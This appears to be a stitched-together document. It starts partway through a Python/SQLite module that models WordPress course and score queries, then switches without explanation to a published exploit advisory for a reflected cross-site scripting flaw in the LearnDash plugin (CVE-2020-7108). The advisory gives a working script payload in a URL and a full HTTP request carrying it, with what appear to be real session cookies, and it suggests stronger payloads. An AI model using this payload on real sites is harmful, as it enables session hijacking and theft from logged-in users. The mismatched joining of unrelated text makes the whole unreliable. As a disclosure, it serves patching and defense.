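    params = [post_type, f"%{term}%"]
    if ids:
        sql += " AND id NOT IN (" + ",".join("?" * len(ids)) + ")"
        params.extend(ids)
    sql += " ORDER BY id"
    return conn.execute(sql, params).fetchall()


def scoring_status(conn, course_id, student: str):
    """Model of the scoring-status lookup: course_id must be an int or the query is refused."""
    (cid,) = parse_id_list([course_id])
    return conn.execute(
        "SELECT student, score FROM scores WHERE course_id = ? AND student = ?",
        (cid, student)).fetchall()


def build_demo_db():
    """Constructed in-memory fixture standing in for the WordPress tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, post_type TEXT, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", [
        (1, "lp_course", "test course one"),
        (2, "lp_course", "test course two"),
        (3, "lp_course", "other"),
        (4, "post", "test post"),
    ])
    conn.execute("CREATE TABLE scores (course_id INTEGER, student TEXT, score INTEGER)")
    conn.executemany("INSERT INTO scores VALUES (?, ?, ?)", [
        (7, "alice", 90), (7, "bob", 71), (8, "alice", 55),
    ])
    return conn
```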
            
# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
# Date: 2020-01-14
# Vendor Homepage: https://www.learndash.com
# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 3.0.0 - 3.1.1
# CVE : CVE-2020-7108

1. Description

LearnDash is one of the most popular and easiest-to-use WordPress LMS plugins on the market. It allows users to easily create courses and sell them online, and boasts a large customer base. The plugin allows users to search for the courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross-site scripting. All WordPress websites using LearnDash versions 3.0.0 through 3.1.1 are affected.

2. Proof of Concept

Once the user is logged in to a WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be entered into the Search Your Courses box. The payload executes because the user input is not properly validated; as a result, passing the payload as a query-string parameter in the URL also executes it.

[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E

An attacker can modify the above URL and use a more advanced payload to perform malicious actions.

GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1
Host: learndashtesting.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://learndashtesting.com/my-account-2/
Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685

3. Timeline

Vulnerability reported to the LearnDash team – January 14, 2020
LearnDash version 3.1.2 containing the fix released – January 14, 2020